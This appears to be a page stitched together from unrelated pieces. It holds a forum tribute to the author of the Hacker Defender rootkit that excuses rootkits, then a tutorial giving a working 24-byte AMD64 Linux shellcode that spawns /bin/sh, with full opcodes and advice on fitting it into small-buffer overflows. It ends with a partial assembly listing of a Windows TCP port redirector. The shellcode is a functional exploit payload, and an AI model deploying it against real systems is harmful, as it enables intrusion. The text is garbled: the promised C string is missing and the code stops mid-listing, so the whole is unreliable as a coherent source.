hf = Holy Father, the guy who coded the " hxdef " Hacker DefenderRootkit, died recently in a car crash ! I wasn't convinced it was true at 1st, but i've since had it confirmed by " someone " who should know.
Whatever " some " people may think of him and his software, there's no doubt that he was talented. Not only that his RK's, software and info etc, all impacted on the way Operating Systems, AntiVirus etc companies had to start to change and begin to try and improve their security more seriously. A lot has happended over the years, but more often than not, it's too little too late ! Most of the improvements/suggestions and quality Apps etc, have come from smaller lesser known companies, and individuals.
Rootkits were around in small numbers before hxdef appeared on the scene, but it was the release of hxdef that made things a lot easier for more people to take advantage of this technology. Which indeed they did and have done so, in increasing numbers ever since. This led to others coding their own RK's etc, and it's taken some time, but now they are almost " mainstream " !
What needs to be remembered is that, RK's in themselves are not bad at all. It's the Payload that usually comes with it that can, and often does, do the damage etc. The RK's task is to hide/stealth both itself and the Payload. Not all RK's are 100% successful in doing both, or either, but even if the're not they can be very hard to detect and remove. So that's why RK's are a clever invention, however much we despise the Payloads for all they do !
So a chapter in PC history has ended tragically, and i have to say that hf wasn't evil etc, he just enjoyed the challenge. Whatever others did with his and similar Tech, wasn't of his doing ! A gun in itself doesn't do anything whatsoever, it has to be loaded by Someone. Then it has to be pointed and fired by them to do Any damage. The RK is the gun, and the Payload is the bullet.
The shellcode has been updated, its size has shrunk from 25 to 24 bytes.
2006-05-01
Added a note about the stack space required (Andreas Geiger). Improved formatting of the assembly/C listings.
Introduction
Extensive documentation can be found on the subject of shellcodes for the i386 (or IA32) architecture, but almost nothing seems to be currently available for the AMD64 architecture.
This article is going to present an AMD64 shellcode for the Linux kernel that is particularly short (24 bytes). We assume the reader already have basic knowledge about shellcodes and i386 architecture.
AMD64 Architecture ABI
The AMD64 architecture ABI specification can be obtained from http://www.amd64.org/documentation. A shellcode developer should be aware of the following main technical differences with respect to i386:
These registers are used for passing arguments to system calls: %rdi, %rsi, %rdx, %r10, %r8, %r9.
The instruction to make a system call is syscall.
The number of the syscall has to be passed in register %rax.
During system calls, the kernel destroys registers %rcx and %r11.
With this simple knowledge, a shellcode can be easily developed.
Shellcode
Here is a disassembly of the shellcode, as produced by objdump -d (with opcodes bytes at the beginning of the line):
6a 3b
push $0x3b
58
pop %rax
# set %rax to 0x3b
99
cltd
# %rdx (arg 3: envp) is set to 0
48 bb 2f 62 69 6e 2f 2f 73 68
mov $0x68732f2f6e69622f,%rbx
# set %rbx to "/bin//sh"
52
push %rdx
# push 0
53
push %rbx
# push "/bin//sh"
54
push %rsp
5f
pop %rdi
# %rdi (arg 1: path) points to "/bin//sh"
52
push %rdx
# push 0
57
push %rdi
# push ptr to path
54
push %rsp
5e
pop %rsi
# %rsi (arg 2: argv) points to ["/bin//sh",0]
0f 05
syscall
# execve(path,argv,envp)
push $0x3b and pop %rax set %rax to 0x3b, which is the syscall number for execve(). Syscall numbers can be found in /usr/src/linux/include/asm-x86_64/unistd.h.
cltd, also known as cdq, sign-extends %eax into %edx:%eax, but since %eax is 0x3b, this set %edx (actually %rdx) to 0. The 3rd argument of execve(), envp, will be %rdx.
mov $0x68732f2f6e69622f,%rbx stores the string "/bin//sh" into %rbx.
push %rdx and push %rbx stores our string followed by NUL bytes in the stack.
push %rsp and pop %rdi is equivalent to mov %rsp,%rdi but it uses less opcode bytes. %rdi now points to "/bin//sh". The 1st argument of execve(), path, will be %rdi.
push %rdx and push %rdi constructs our argv array in the stack.
push %rsp and pop %rsi, equivalent to mov %rsp,%rsi, stores a pointer to the argv array into %rsi. The 2nd argument of execve(), argv, will be %rsi.
syscall enters in kernel mode and processes the system call. Its 3 arguments are %rdi (path), %rsi (argv) and %rdx (envp), that is: execve("/bin//sh", ["/bin//sh", NULL], NULL). Linux indeed allows a NULL envp pointer.
The AMD64 shellcode presented above has a length of only 24 bytes. This makes it particularly useful when exploiting overflows of small buffers. Please note however that it uses 40 bytes of stack space; depending on the stack layout it might be a problem because the push operations can corrupt the shellcode itself. In such cases it is usually possible to add an instruction at the beginning of the shellcode that modifies %rsp to make it point to a safe area (e.g. add $40, %rsp).
Here is the shellcode represented as a C language string:
This article has given the reader a quick overview on the process of developing assembly code using the AMD64 Linux kernel calling conventions. As a practical exemple, a 24-byte shellcode has been presented and explained.
Thanks
I would like to thank those people for their comments and suggestions, in alphabetical order:
;====================[ The Smallest TCP Port Redirector ]=======================
;
;
;programmed by Holy_Father <holy_father@phreaker.net>
;Copyright (c) 2000,forever ExEwORx
;birthday: 8.9.2002
;version: 1.0
;
;compiled with MASM 6.14 with ALIGN:4
;total size: 2512b
;write no output, silently terminates when error
;it is multithreaded and stable on Windows NT 4.0, Windows 2000 and Windows XP
;
;usage: sredir.exe listen_on_port redir_to_ip redir_to_port
; redir_to_ip must be IP address in A.B.C.D format
; no DNS implemented
;
;example: sredir.exe 100 212.80.76.18 80
;
;no other comments, cuz code is comment :)
;
.386p
.model flat, stdcall
include kernel32.inc
include winsock2.inc
LocalAlloc PROTO :DWORD,:DWORD
LocalFree PROTO :DWORD
ExitThread PROTO :DWORD
ExitProcess PROTO :DWORD
GetCommandLineA PROTO
Sleep PROTO :DWORD
CloseHandle PROTO :DWORD
CreateThread PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
TerminateThread PROTO :DWORD,:DWORD
WaitForMultipleObjects PROTO :DWORD,:DWORD,:DWORD,:DWORD
bind PROTO :DWORD,:DWORD,:DWORD
listen PROTO :DWORD,:DWORD
recv PROTO :DWORD,:DWORD,:DWORD,:DWORD
send PROTO :DWORD,:DWORD,:DWORD,:DWORD
closesocket PROTO :DWORD
inet_addr PROTO :DWORD
WSAIoctl PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,
:DWORD,:DWORD
WSAStartup PROTO :DWORD,:DWORD
WSACleanup PROTO
WSACreateEvent PROTO
WSASocketA PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAConnect PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAEnumNetworkEvents PROTO :DWORD,:DWORD,:DWORD
WSAAccept PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAEventSelect PROTO :DWORD,:DWORD,:DWORD
WSAWaitForMultipleEvents PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
@IntToStr:
push esi ;保存参数指针
xor eax,eax ;清空eax,edx
xor edx,edx
mov esi,[esp+008h] ;将edi的值存入esi。如果问为什么,自己去算下
@IntToStr_next_char:
lodsb ;像eax中装入一个字节
test eax,eax ;是否到达null
jz @IntToStr_end ;日,到了,跑路
imul edx,edx,00Ah ;edx=edx*10
cmp al,030h ;al是否为0
jb @IntToStr_error ;汗比0还小,跳
cmp al,039h ;是否为9
ja @IntToStr_error ;汗,比九大跳
sub eax,030h
add edx,eax ;转换完成
jmp @IntToStr_next_char ;处理下一个字符
@IntToStr_error:
xor edx,edx ;清空edx
dec edx
@IntToStr_end:
mov eax,edx
pop esi
ret
@arg_len: ;@arg -> edi, char -> eax
push edi ;指向参数的字符串
xor ecx,ecx
dec ecx ;比较是否已经到达空格,没有则重复
repnz scasb ;
not ecx ;这里说明一下,ecx为什么要设为-1,因为偶们的指针现在指向的是参数的尾部
dec ecx ;偶们要采取逆序的方法查找前一个空格,故设为负值在求反减1就能得到长度
mov eax,ecx ;如果不这样做,而采用调整指针,会浪费很多代码,不利于优化,这段代码值得大家学习的说
pop edi
ret
@Find_arg: ;str -> esi -> esi
lodsb
cmp al,020h
jz @Find_arg
dec esi
ret